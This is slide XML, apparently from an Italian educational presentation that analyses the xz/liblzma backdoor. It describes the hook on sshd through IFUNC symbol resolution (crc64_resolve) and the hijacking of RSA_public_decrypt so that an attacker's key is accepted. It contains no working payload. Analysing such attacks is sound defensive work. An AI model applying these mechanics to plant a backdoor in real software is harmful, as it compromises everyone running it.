                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>is_arch_extension_supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>()
            ? &amp;crc64_arch_optimized : &amp;crc64_generic;
}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50260029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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Audit hook su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64BE8AD-EB14-4EBD-B321-846562A4BF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8559" y="2470879"/>
            <a:ext cx="7014882" cy="4112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18143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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="169277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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup del gancio su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attivazione del servizio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> integrato con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: risolve le dipendenze, carica la libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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BF0BFECA-4F28-0808-33AF-50CE4F0209EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="146958" y="3891642"/>
            <a:ext cx="11348356" cy="26776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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.   Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> linker deve caricare i simboli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, quindi li cerca:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Segnale LD_BIND_NOW causa la risoluzione dei simboli IFUNC per primi;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Viene richiamata crc64_resolve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(backdoor)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> tra i simboli IFUNC;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La backdoor riesce ad agganciare il processo del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> linker, inserendo la sua versione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tra i simboli che il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> linker deve caricare.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light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127656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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85289" y="1981907"/>
            <a:ext cx="12115185" cy="181588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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Linux Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Organizzazione non-profit che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fornisce un hub neutrale e affidabile per sviluppatori e organizzazioni per codificare, gestire e scalare progetti ed ecosistemi di tecnologia aperta.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, Carattere, logo, Elementi grafici&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACC1C0D-D4C8-DD70-2607-7B6B73CD7F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0" y="4425692"/>
            <a:ext cx="6096000" cy="2272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04676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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="501675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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Funzionamento del gancio su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ora risolverà il simbolo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1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it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>con una funzione interna al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programma backdoor, il quale rimane in attesa;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.   Quando un pacchetto raggiunge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> viene richiesta l'autenticazione chiamando</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1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it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>per verificare se la chiave privata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> si risolve con una chiave pubblica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-250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it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nel sistema. Il pacchetto con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>viene dato in input alla backdoor:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Verifica caratteristiche del pacchetto;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La backdoor stessa chiama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>libcrypto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> per risolvere l'autenticazione;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
